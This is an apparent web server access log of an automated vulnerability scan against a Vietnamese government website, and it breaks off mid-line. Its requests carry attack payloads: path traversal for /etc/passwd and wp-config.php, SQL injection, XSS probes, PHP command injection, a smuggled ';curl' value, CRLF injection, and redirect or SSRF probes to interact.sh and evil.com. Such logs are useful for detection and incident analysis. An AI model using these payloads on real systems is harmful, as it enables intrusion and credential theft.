Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 1117 2023-11-09 19:04:41 103.153.214.94 GET /services/user/values.xml var=STATUS 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 1111 2023-11-09 19:05:26 103.153.214.94 GET /html/device-id - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 364 2023-11-09 19:07:19 103.153.214.94 GET /blast/nph-viewgif.cgi ../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 362 2023-11-09 19:08:56 103.153.214.94 GET /fuel/pages/select/ filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 365 2023-11-09 19:09:05 103.153.214.94 GET /plugins/captcha/crypt/cryptographp.php cfg=1%0D%0ASet-Cookie:%20crlfinjection=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 389 2023-11-09 19:09:16 103.153.214.94 POST /web/google_analytics.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 1462 2023-11-09 19:10:22 103.153.214.94 GET /api/console/api_server sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 0 2 378 2023-11-09 19:10:24 103.153.214.94 GET /select_project.php url=http://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 391 2023-11-09 19:10:27 103.153.214.94 GET /clock_status.php current_page=http://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 370 2023-11-09 19:10:31 103.153.214.94 GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 https://bcvt.kontum.gov.vn 200 0 0 366 2023-11-09 19:11:14 103.153.214.94 POST /wp-admin/admin.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 373 2023-11-09 19:11:34 103.153.214.94 GET /wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 377 2023-11-09 19:11:40 103.153.214.94 GET /plus/feedback.php/rp4hu'><script>alert(document.domain)</script> aid=3 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 364 2023-11-09 19:11:55 103.153.214.94 GET /admin/index.php module=file_editor&file=/../../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 301 0 0 371 2023-11-09 19:11:55 103.153.214.94 GET /microstrategy7/Login.asp Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/2XwZKhTB2WcCtxpwQHMfPJBZeAL/)%3B%3C%2Fscript%3E%3C 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 391 2023-11-09 19:12:17 103.153.214.94 GET /html/common/forward_js.jsp FORWARD_URL=http://evil.com 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 361 2023-11-09 19:12:20 103.153.214.94 GET /html/portlet/ext/common/page_preview_popup.jsp hostname=evil.com 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 363 2023-11-09 19:12:34 103.153.214.94 GET /WebMstr7/servlet/mstrWeb evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 370 2023-11-09 19:12:40 103.153.214.94 GET /manage/webshell/u s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 367 2023-11-09 19:12:43 103.153.214.94 GET /manage/webshell/u s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 363 2023-11-09 19:12:56 103.153.214.94 GET /jasperserver-pro/reportresource/reportresource/ resource=net/sf/jasperreports/../../../../js.jdbc.properties 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 368 2023-11-09 19:13:49 103.153.214.94 GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 0 2 2451 2023-11-09 19:13:51 103.153.214.94 GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 362 2023-11-09 19:15:24 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 378 2023-11-09 19:15:27 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 364 2023-11-09 19:18:11 103.153.214.94 GET /iwc/idcStateError.iwc page=javascript%3aalert(document.domain)%2f%2f 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 363 2023-11-09 19:18:18 103.153.214.94 GET /sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 362 2023-11-09 19:18:33 103.153.214.94 GET /enginemanager/server/logs/download logType=error&logName=../../../../../../../../etc/passwd&logSource=engine 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 369 2023-11-09 19:18:52 103.153.214.94 GET /index.php q=file:///etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 364 2023-11-09 19:20:18 103.153.214.94 GET /src/login.php referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 368 2023-11-09 19:20:31 103.153.214.94 GET /tarantella/cgi-bin/secure/ttawlogin.cgi/ action=start&pg=../../../../../../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 367 2023-11-09 19:22:46 103.153.214.94 GET /wp-content/plugins/jsmol2wp/php/jsmol.php isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 393 2023-11-09 19:23:31 103.153.214.94 GET /_s_/dyn/Log_highlight href=../../../../windows/win.ini&n=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 365 2023-11-09 19:23:49 103.153.214.94 GET /wp-content/plugins/jsmol2wp/php/jsmol.php isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 393 2023-11-09 19:24:49 103.153.214.94 GET /imcat/root/tools/adbug/binfo.php phpinfo1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 365 2023-11-09 19:25:29 103.153.214.94 GET /plugins/servlet/Wallboard/ dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 363 2023-11-09 19:25:40 103.153.214.94 POST /wp-content/plugins/wp-payeezy-pay/donate.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 363 2023-11-09 19:26:19 103.153.214.94 POST /php/upload.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.5112.81+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 367 2023-11-09 19:26:22 103.153.214.94 GET /Uploads/2XwZLC40ZMgljXsk96RE5QklSTz.php7 - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 363 2023-11-09 19:26:52 103.153.214.94 POST /OA_HTML/lcmServiceController.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 366 2023-11-09 19:26:56 103.153.214.94 POST /XMLCHART - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 367 2023-11-09 19:28:11 103.153.214.94 GET /pages/includes/status-list-mo<iframe+src="javascript:alert(document.domain)">.vm - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 372 2023-11-09 19:28:23 103.153.214.94 GET /admin/tools/a--</script><script>alert(document.domain)</script> - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 301 0 0 367 2023-11-09 19:28:44 103.153.214.94 GET /wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php page=</script>"><script>alert(document.domain)</script> 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 366 2023-11-09 19:29:15 103.153.214.94 GET /index.php action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 364 2023-11-09 19:29:20 103.153.214.94 GET /assets/file:/etc/passwd - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 360 2023-11-09 19:30:05 103.153.214.94 GET /index.php option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 401 2023-11-09 19:30:15 103.153.214.94 POST /wp-admin/options-general.php page=smartcode 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 388 2023-11-09 19:30:18 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 370 2023-11-09 19:30:47 103.153.214.94 POST /ws_utc/resources/setting/options - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 362 2023-11-09 19:30:52 103.153.214.94 POST /ws_utc/resources/setting/keystore - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 361 2023-11-09 19:31:02 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq"><script>alert(document.domain)</script> 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 363 2023-11-09 19:31:05 103.153.214.94 GET /cs/Satellite pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 364 2023-11-09 19:31:07 103.153.214.94 POST /soap.cgi service=whatever-control;curl 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 364 2023-11-09 19:31:07 103.153.214.94 GET /cs/Satellite pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 363 2023-11-09 19:31:39 103.153.214.94 GET /include/downmix.inc.php - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 362 2023-11-09 19:31:39 103.153.214.94 GET /anchor/errors.log - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 392 2023-11-09 19:31:59 103.153.214.94 GET /redirector.php url=https://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 363 2023-11-09 19:32:01 103.153.214.94 GET /redirector.php do=nodelay&url=https://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 368 2023-11-09 19:33:26 103.153.214.94 POST /login.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 1987 2023-11-09 19:34:48 103.153.214.94 POST /user/register element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 bcvt.kontum.gov.vn/user/register 405 0 1 391 2023-11-09 19:35:37 103.153.214.94 GET /index.php m=search&c=index&a=initxqb4n<img%20src%3da%20onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 379 2023-11-09 19:35:56 103.153.214.94 GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php ajax_path=../../../../../../../wp-config.php 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 372 2023-11-09 19:35:59 103.153.214.94 GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php ajax_path=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 366 2023-11-09 19:36:20 103.153.214.94 GET /tag_test_action.php url=a&token&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field} 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 362 2023-11-09 19:37:34 103.153.214.94 GET /admin/queues.jsp QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 301 0 0 365 2023-11-09 19:37:35 103.153.214.94 GET /includes/mysql2i/mysql2i.func.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 364 2023-11-09 19:37:38 103.153.214.94 GET /addons/phpmailer/phpmailer.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 388 2023-11-09 19:37:43 103.153.214.94 POST /webtools/control/xmlrpc - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 364 2023-11-09 19:38:07 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 371 2023-11-09 19:38:09 103.153.214.94 GET /wp-content/uploads/wp-security-audit-log/failed-logins/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 362 2023-11-09 19:38:50 103.153.214.94 GET /tests/generate.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 363 2023-11-09 19:38:58 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 1786 2023-11-09 19:40:05 103.153.214.94 GET /user/scripts/login_par.js - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 368 2023-11-09 19:40:34 103.153.214.94 GET /wp-content/plugins/wpsite-background-takeover/exports/download.php filename=../../../../wp-config.php 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 366 2023-11-09 19:40:38 103.153.214.94 GET /sites/all/modules/avatar_uploader/lib/demo/view.php file=../../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 364 2023-11-09 19:40:52 103.153.214.94 GET /Admin - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 301 0 0 369 2023-11-09 19:40:53 103.153.214.94 GET /Admin/ - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 https://bcvt.kontum.gov.vn/Admin 200 0 0 368 2023-11-09 19:41:36 103.153.214.94 GET /device.rsp opt=user&cmd=list 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 365 2023-11-09 19:43:17 103.153.214.94 GET /solr/admin/cores wt=json 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 365 2023-11-09 19:43:38 103.153.214.94 GET / id=BLnBsg%25{128*128} 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 369 2023-11-09 19:44:14 103.153.214.94 GET /google.com/evil.html - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 363 2023-11-09 19:44:17 103.153.214.94 POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 1466 2023-11-09 19:44:26 103.153.214.94 GET /http:/www.interact.sh - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 366 2023-11-09 19:44:50 103.153.214.94 POST /timesheet/login.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 2328 2023-11-09 19:45:23 103.153.214.94 GET /printenv.shtml %3Cscript%3Ealert%28660569997%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 366 2023-11-09 19:45:26 103.153.214.94 GET /ssi/printenv.shtml %3Cscript%3Ealert%28660569997%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 363 2023-11-09 19:45:50 103.153.214.94 GET /modules/babel/redirect.php newurl=http://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 369 2023-11-09 19:47:05 103.153.214.94 GET /api/filemanager path=%2F..%2f..%2fContent 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 0 2 2550 2023-11-09 19:47:07 103.153.214.94 GET /plugin/build-metrics/getBuildStats label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter&nodeFilteringType=ALL&nodeFilter&launcherFilteringType=ALL&launcherFilter&causeFilteringType=ALL&causeFilter&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRege